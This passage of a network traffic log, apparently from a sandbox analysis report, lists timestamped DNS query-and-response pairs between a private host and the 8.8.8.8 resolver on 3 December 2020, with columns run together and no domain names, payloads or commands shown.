                                    Dec 3, 2020 10:03:19.347383022 CET53590348.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:19.666008949 CET5310653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:19.693027973 CET53531068.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:19.815073967 CET6213253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:19.852605104 CET53621328.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:20.114562035 CET5448953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:20.141608000 CET53544898.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:20.585319996 CET6439053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:20.612430096 CET53643908.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:20.865005970 CET5836953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:20.892046928 CET53583698.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:21.350702047 CET6420353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:21.386265039 CET53642038.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:21.938216925 CET4923253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:21.965183020 CET53492328.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:22.212102890 CET5255853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:22.239182949 CET53525588.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:22.710444927 CET5355553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:22.737561941 CET53535558.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:22.973746061 CET5008353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:23.001060009 CET53500838.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:23.470324039 CET4980453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:23.506064892 CET53498048.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:23.971995115 CET6296353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:23.999000072 CET53629638.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:24.279090881 CET6369553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:24.315536022 CET53636958.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:24.629245996 CET6429653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:24.656239986 CET53642968.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:25.133505106 CET6084453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:25.160573959 CET53608448.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:25.611252069 CET6391753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:25.638206959 CET53639178.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:26.139666080 CET5185153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:26.166709900 CET53518518.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:26.750502110 CET4989853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:26.777601957 CET53498988.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:27.020617962 CET4963253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:27.047732115 CET53496328.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:27.542334080 CET6536153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:27.569431067 CET53653618.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:28.052023888 CET5020653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:28.079176903 CET53502068.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:28.320911884 CET4961353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:28.347884893 CET53496138.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:28.947045088 CET6303253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:28.974086046 CET53630328.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:29.212243080 CET5489853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:29.239267111 CET53548988.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:29.856785059 CET6171053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:29.883810997 CET53617108.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:30.428265095 CET5207353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:30.455344915 CET53520738.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:30.940175056 CET6394953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:30.967179060 CET53639498.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:31.211011887 CET5756153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:31.238079071 CET53575618.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:31.701210022 CET5320553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:31.728187084 CET53532058.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:31.965411901 CET6057953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:31.992304087 CET53605798.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:32.553005934 CET4976553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:32.580051899 CET53497658.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:32.813930035 CET5765053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:32.841048956 CET53576508.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:33.387254000 CET6531753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:33.414453983 CET53653178.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:33.887957096 CET6465453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:33.915010929 CET53646548.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:34.397080898 CET5119153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:34.424179077 CET53511918.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:34.893606901 CET6387053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:34.920726061 CET53638708.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:35.446471930 CET5701353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:35.481955051 CET53570138.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:35.982255936 CET5874553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:36.018115044 CET53587458.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:36.558135033 CET6427253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:36.585150003 CET53642728.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:37.046510935 CET5644053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:37.073591948 CET53564408.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:37.585237980 CET5949253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:37.612159967 CET53594928.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:38.089342117 CET6212553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:38.116751909 CET53621258.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:38.558370113 CET6177653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:38.593563080 CET53617768.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:39.105139017 CET5392853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:39.132040977 CET53539288.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:39.622893095 CET5105853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:39.660496950 CET53510588.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:39.961132050 CET5671153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:39.990310907 CET53567118.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:40.350091934 CET5478053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:40.385514975 CET53547808.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:40.643349886 CET5430553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:40.670334101 CET53543058.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:40.917800903 CET6166953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:40.944808006 CET53616698.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:41.210357904 CET5733653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:41.237742901 CET53573368.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:41.501154900 CET6457753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:41.528228045 CET53645778.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:41.788903952 CET6498753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:41.815978050 CET53649878.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:42.078183889 CET5865553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:42.105398893 CET53586558.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:42.745702982 CET6090553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:42.772661924 CET53609058.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:43.046442032 CET6277653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:43.073678017 CET53627768.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:43.359462976 CET5692353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:43.386657953 CET53569238.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:43.637032032 CET6520153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:43.663877010 CET53652018.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:43.957545042 CET5426453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:43.984477043 CET53542648.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:44.347207069 CET5843953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:44.374341965 CET53584398.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:44.619749069 CET5423553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:44.646862984 CET53542358.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:44.920094967 CET5587653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:44.947272062 CET53558768.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:45.199316978 CET5699453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:45.226454020 CET53569948.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:45.705465078 CET5883253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:45.740957022 CET53588328.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:46.270900965 CET5180053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:46.297924995 CET53518008.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:46.745162964 CET5883653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:46.772357941 CET53588368.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:47.266988039 CET6466953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:47.294194937 CET53646698.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:47.829632998 CET6473553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:47.856794119 CET53647358.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:48.394521952 CET5247253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:48.421653986 CET53524728.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:48.946424961 CET5169753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:48.973506927 CET53516978.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:49.333678007 CET5675253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:49.368880033 CET53567528.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:49.653568029 CET5544753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:49.680624962 CET53554478.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:50.292429924 CET5372253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:50.319664955 CET53537228.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:50.652407885 CET6393453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:50.679482937 CET53639348.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:50.984679937 CET6424153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:51.011617899 CET53642418.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:51.184968948 CET6017453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:51.212004900 CET53601748.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:51.697694063 CET5367853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:51.724632978 CET53536788.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:51.771825075 CET5505953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:51.809716940 CET53550598.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:51.962105036 CET6365453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:51.989200115 CET53636548.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:52.491959095 CET5402553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:52.518933058 CET53540258.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:53.082986116 CET5422753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:53.110177994 CET53542278.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:53.163695097 CET5562053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:53.190767050 CET53556208.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:53.692517996 CET6234253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:53.719638109 CET53623428.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:53.964230061 CET6160453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:53.991311073 CET53616048.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:54.522007942 CET5634053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:54.549211979 CET53563408.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:55.105586052 CET5401153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:55.132646084 CET53540118.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:55.323895931 CET4960853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:55.359492064 CET53496088.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:55.802597046 CET5252953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:55.829653025 CET53525298.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:56.065541029 CET5890153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:56.092653990 CET53589018.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:56.584539890 CET5629753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:56.611583948 CET53562978.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:57.100286007 CET5958053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:57.127315044 CET53595808.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:57.629905939 CET5429953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:57.665216923 CET53542998.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:58.233308077 CET5854953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:58.260405064 CET53585498.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:58.499917984 CET5238553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:58.526932001 CET53523858.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:58.767443895 CET5090753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:58.794562101 CET53509078.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:59.049704075 CET5910353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:59.076771021 CET53591038.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:59.326589108 CET5638653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:59.353662014 CET53563868.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:59.609312057 CET6205353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:59.636375904 CET53620538.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:59.880233049 CET5460853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:59.915659904 CET53546088.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:00.164766073 CET5262953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:00.191922903 CET53526298.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:00.456994057 CET5197453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:00.484050989 CET53519748.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:00.739052057 CET5063853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:00.766160965 CET53506388.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:01.117043972 CET5615353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:01.144134998 CET53561538.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:01.421802998 CET6200053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:01.448929071 CET53620008.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:01.710134983 CET5395053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:01.737176895 CET53539508.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:02.015068054 CET6376953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:02.042148113 CET53637698.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:02.381865025 CET5549353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:02.409003019 CET53554938.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:02.661564112 CET5252553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:02.688880920 CET53525258.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:02.942312956 CET6359053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:02.969583988 CET53635908.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:03.232505083 CET5461853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:03.259670019 CET53546188.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:03.505784988 CET6285653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:03.532891989 CET53628568.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:03.795294046 CET4921453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:03.822348118 CET53492148.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:04.074474096 CET5749353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:04.101543903 CET53574938.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:04.355796099 CET5924753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:04.391450882 CET53592478.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:04.647460938 CET5080953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:04.674464941 CET53508098.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:04.915332079 CET5543353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:04.942394018 CET53554338.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:05.199299097 CET5996253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:05.226393938 CET53599628.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:05.483560085 CET5520153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:05.510657072 CET53552018.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:05.769323111 CET6174253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:05.796542883 CET53617428.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:06.074758053 CET5332353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:06.101805925 CET53533238.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:06.352900982 CET5926253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:06.380043030 CET53592628.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:06.635427952 CET5615953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:06.662600994 CET53561598.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:06.949789047 CET5218853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:06.977004051 CET53521888.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:07.224431038 CET5839753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:07.251466990 CET53583978.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:07.525737047 CET5476253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:07.552763939 CET53547628.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:07.808995962 CET5557753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:07.835998058 CET53555778.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:08.217499971 CET5603353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:08.244343996 CET53560338.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:08.498416901 CET5925153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:08.525451899 CET53592518.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:08.637617111 CET5146753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:08.664602995 CET53514678.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:08.778889894 CET6270853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:08.805875063 CET53627088.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:09.057873011 CET5379853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:09.084884882 CET53537988.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:09.325339079 CET5384253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:09.352477074 CET53538428.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:09.508215904 CET5707153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:09.544054985 CET53570718.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:09.614290953 CET5993053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:09.641357899 CET53599308.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:09.901053905 CET5699853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:09.928231001 CET53569988.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:10.190378904 CET5622853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:10.217499018 CET53562288.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:10.459393978 CET6249153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:10.486563921 CET53624918.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:10.736605883 CET6130053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:10.763757944 CET53613008.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:11.023058891 CET5510053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:11.050237894 CET53551008.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:11.390893936 CET5187253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:11.417982101 CET53518728.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:11.669486046 CET6047653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:11.696677923 CET53604768.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:11.944083929 CET5506953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:11.971090078 CET53550698.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:12.247473955 CET5917253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:12.274544001 CET53591728.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:12.585220098 CET5707953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:12.612289906 CET53570798.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:12.864528894 CET6011153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:12.891649008 CET53601118.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:13.144134045 CET5646353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:13.171314955 CET53564638.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:13.455523968 CET5988053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:13.482465029 CET53598808.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:13.773528099 CET5500053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:13.800709963 CET53550008.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:14.070842981 CET5034153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:14.097882986 CET53503418.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:14.356909990 CET6036953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:14.383955002 CET53603698.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:14.643935919 CET5267753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:14.670947075 CET53526778.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:14.910386086 CET4934753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:14.937441111 CET53493478.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:15.187752008 CET6360453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:15.214709044 CET53636048.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:15.465322018 CET5016553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:15.492562056 CET53501658.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:15.742861986 CET6172853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:15.769968987 CET53617288.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:16.022732019 CET6169053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:16.049843073 CET53616908.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:16.517864943 CET5219253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:16.544792891 CET53521928.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:16.820955038 CET5809053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:16.847960949 CET53580908.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:17.112066031 CET5031153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:17.139122009 CET53503118.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:17.833745956 CET5348453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:17.860759974 CET53534848.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:18.132854939 CET6522553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:18.159993887 CET53652258.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:19.915863037 CET5030853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:19.942914009 CET53503088.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:20.226304054 CET5828153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:20.253314972 CET53582818.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:20.501063108 CET5944853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:20.528146982 CET53594488.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:20.803499937 CET5509753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:20.830697060 CET53550978.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:21.247961044 CET5760753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:21.274955034 CET53576078.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:21.527256012 CET4973453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:21.554297924 CET53497348.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:21.853420019 CET6325453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:21.880640030 CET53632548.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:22.121886015 CET5961053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:22.148855925 CET53596108.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:22.394130945 CET5850553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:22.421103954 CET53585058.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:22.719099998 CET5824253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:22.746226072 CET53582428.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:22.981034994 CET5234153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:23.007875919 CET53523418.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:23.254004002 CET6187653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:23.281064034 CET53618768.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:23.541433096 CET6345553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:23.568725109 CET53634558.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:23.816549063 CET6461053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:23.843622923 CET53646108.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:24.106113911 CET5157053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:24.133373022 CET53515708.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:24.394944906 CET6056253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:24.422159910 CET53605628.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:24.686381102 CET6392753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:24.713453054 CET53639278.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:25.305768967 CET5235253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:25.332806110 CET53523528.8.8.8192.168.2.3
